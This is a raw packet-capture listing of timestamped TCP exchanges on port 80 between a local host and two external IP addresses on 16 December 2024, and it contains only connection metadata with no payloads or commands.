Dec 16, 2024 11:03:32.892812967 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.892818928 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.892831087 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.892859936 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.892885923 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.892890930 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.892946005 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.893560886 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.893589020 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.893604994 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.893692970 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.893702984 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.893702984 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.893868923 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.894339085 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.894388914 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.894421101 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.894438982 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.894470930 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.894496918 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.894500017 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.894675970 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.895128965 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.895163059 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.895173073 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.895282984 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.895311117 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.895324945 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.895963907 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.896038055 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.896054029 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.896090984 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.896130085 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.896164894 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.896531105 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.896714926 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.896770000 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.896780014 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.896795034 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.896826982 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.896828890 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.896852970 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.896881104 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.897645950 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.897696018 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.897703886 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.897721052 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.897757053 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.897777081 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.897881985 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.897933960 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.898410082 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.898438931 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.898454905 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.898458958 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.898488045 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.898513079 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.898516893 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.898582935 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.899099112 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.899147034 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.899148941 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.899167061 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.899204016 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.899219990 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.899234056 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.899292946 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.899928093 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.899975061 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.899983883 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.900000095 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.900029898 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.900033951 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.900058985 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.900082111 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.900685072 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.900715113 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.900729895 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.900739908 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.900767088 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.900791883 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.900820971 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.900872946 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.901494026 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.901540995 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.901551962 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.901568890 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.901597023 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.901623011 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.901652098 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.901700020 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.902376890 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.902420044 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.902424097 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.902441025 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.902476072 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.902477026 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.902499914 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.902523994 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.903062105 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.903109074 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.903111935 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.903131008 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.903166056 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.903187037 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.903214931 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.903268099 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.903882027 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.903932095 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.903958082 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.903974056 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.904011965 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.904027939 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.904041052 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.904103994 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.904661894 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.904716015 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.904732943 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.904751062 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.904783964 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.904784918 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.904809952 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.904839039 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.905435085 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.905487061 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.905524969 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.905541897 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.905575991 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.905575991 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.905601978 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.905625105 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.906318903 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.906366110 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.906380892 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.906399012 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.906434059 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.906459093 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.906605959 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.906653881 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.907047987 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.907075882 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.907092094 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.907100916 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.907124996 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.907154083 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.907182932 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.907224894 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.907850981 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.907877922 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.907893896 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.907900095 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.907932997 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.908020973 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.908102036 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.908617973 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.908665895 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.908668995 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.908687115 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.908718109 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.908745050 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.908780098 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.908829927 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.909413099 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.909461975 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.909471989 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.909487963 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.909518957 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.909543037 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.909564972 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.909626007 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.910226107 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.910273075 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.910285950 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.910303116 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.910332918 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.910361052 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.910361052 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.910407066 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.911011934 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.911058903 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.911079884 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.911097050 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.911128998 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.911154985 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.911158085 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:32.911222935 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:32.921554089 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.921574116 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.921619892 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.921641111 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.921650887 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.921679020 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.921700954 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.921725035 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.921780109 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.921798944 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.921835899 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.921860933 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.921864986 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.921891928 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.921917915 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.921942949 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.921968937 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.921983004 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.922018051 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.922038078 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.922077894 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.922092915 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.922125101 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.922152996 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.922164917 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.922178030 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.922215939 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.922241926 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.922250032 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.922296047 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.922319889 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.922363997 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.922445059 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.922493935 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.922518015 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.922552109 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.922560930 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.922593117 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.922600985 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.922633886 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.922672987 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.922687054 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.922723055 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.922748089 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.922764063 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.922792912 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.922821999 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.922837019 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.922868013 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.922902107 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.922924995 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.922950029 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.922950029 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.922965050 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.922987938 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.923003912 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.923037052 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.923038006 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.923084021 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.923095942 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.923099041 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.923140049 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.923232079 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.923244953 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.923295975 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.923361063 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.923378944 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.923394918 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:32.923429012 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:32.923454046 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.041529894 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.041558981 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.041634083 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.041687965 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.041708946 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.041774035 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.041774035 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.041783094 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.042028904 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.042072058 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.042093992 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.042120934 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.042123079 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.042182922 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.042216063 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.042241096 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.042246103 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.042270899 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.042294979 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.042308092 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.042356014 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.042393923 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.042422056 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.042445898 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.042454958 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.042475939 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.042501926 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.042510986 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.042543888 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.042560101 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.042593956 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.042593956 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.042628050 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.042644024 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.042680979 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.042710066 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.042740107 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.042764902 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.042788029 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.042789936 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.042819977 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.042840958 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.042850971 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.042864084 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.042898893 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.042902946 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.042937040 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.042949915 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.042982101 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.042987108 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.043040037 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.043041945 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.043071032 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.043097973 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.043140888 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.043154001 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.043185949 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.043203115 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.043220043 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.043237925 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.043247938 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.043275118 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.043298960 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.043301105 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.043349028 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.043400049 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.043402910 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.043427944 CET	80	49843	141.8.192.141	192.168.2.5
Dec 16, 2024 11:03:33.043518066 CET	49843	80	192.168.2.5	141.8.192.141
Dec 16, 2024 11:03:33.083249092 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.083282948 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.083349943 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.083358049 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.083389997 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.083405972 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.083422899 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.083435059 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.083442926 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.083472967 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.083524942 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.084161043 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.084198952 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:33.084216118 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:33.084234953 CET	80	49833	31.41.244.11	192.168.2.5
